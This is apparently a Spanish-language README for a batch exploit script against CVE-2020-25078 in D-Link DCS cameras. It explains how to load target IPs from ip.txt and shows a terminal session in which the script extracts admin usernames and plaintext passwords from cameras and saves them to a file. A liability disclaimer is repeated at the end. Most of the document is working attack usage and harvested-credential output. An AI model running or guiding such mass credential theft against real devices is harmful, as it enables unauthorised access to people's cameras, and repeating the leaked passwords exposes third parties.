
Script de exploit por lotes para CVE-2020-25078 dirigido a cámaras de la serie DCS de D-Link para extraer credenciales de cuenta mediante una vulnerabilidad de divulgación de información.
Coloque la URL de ataque en el mismo directorio que ip.txt
La IP de ataque se coloca en el mismo directorio que ip.txt
root@localhost:~/CVE-2020-25078#ls
CVE-2020-25078.py ip.txt
root@localhost:~/CVE-2020-25078#cat ./ip.txt
root@localhost:~/CVE-2020-25078#python3 ./CVE-2020-25078.py
Start Running Exploit...
[+Login URL]==> http://xxx.xxx.xxx.xxx:80 UserName: ['admin'] PassWord: ['Sruthimina123']
[+Login URL]==> http://xxx.xxx.xxx.xxx:443 UserName: ['admin'] PassWord: ['ming502219']
root@localhost:~/CVE-2020-25078# ls -l
CVE-2020-25078.py
exploit_ok.txt
ip.txt
README.md
root@localhost:~/CVE-2020-25078# cat ./exploit_ok.txt
[+Login URL]==>http://xxx.xxx.xxx.xxx:80 [+UserName]==>['admin'] [+PassWord]==>['Sruthimina123']
[+Login URL]==>http://xxx.xxx.xxx.xxx:443 [+UserName]==>['admin'] [+PassWord]==>['ming502219']
root@localhost:~/CVE-2020-25078#
Cualquier consecuencia o pérdida, directa o indirecta, causada por la difusión y el uso de la información proporcionada en este documento, será responsabilidad del propio usuario; el autor no asume ninguna responsabilidad por ello. Cualquier consecuencia o pérdida, directa o indirecta, causada por la difusión y el uso de la información proporcionada en este artículo, será asumida por el propio usuario, y el autor no asumirá ninguna responsabilidad por ello.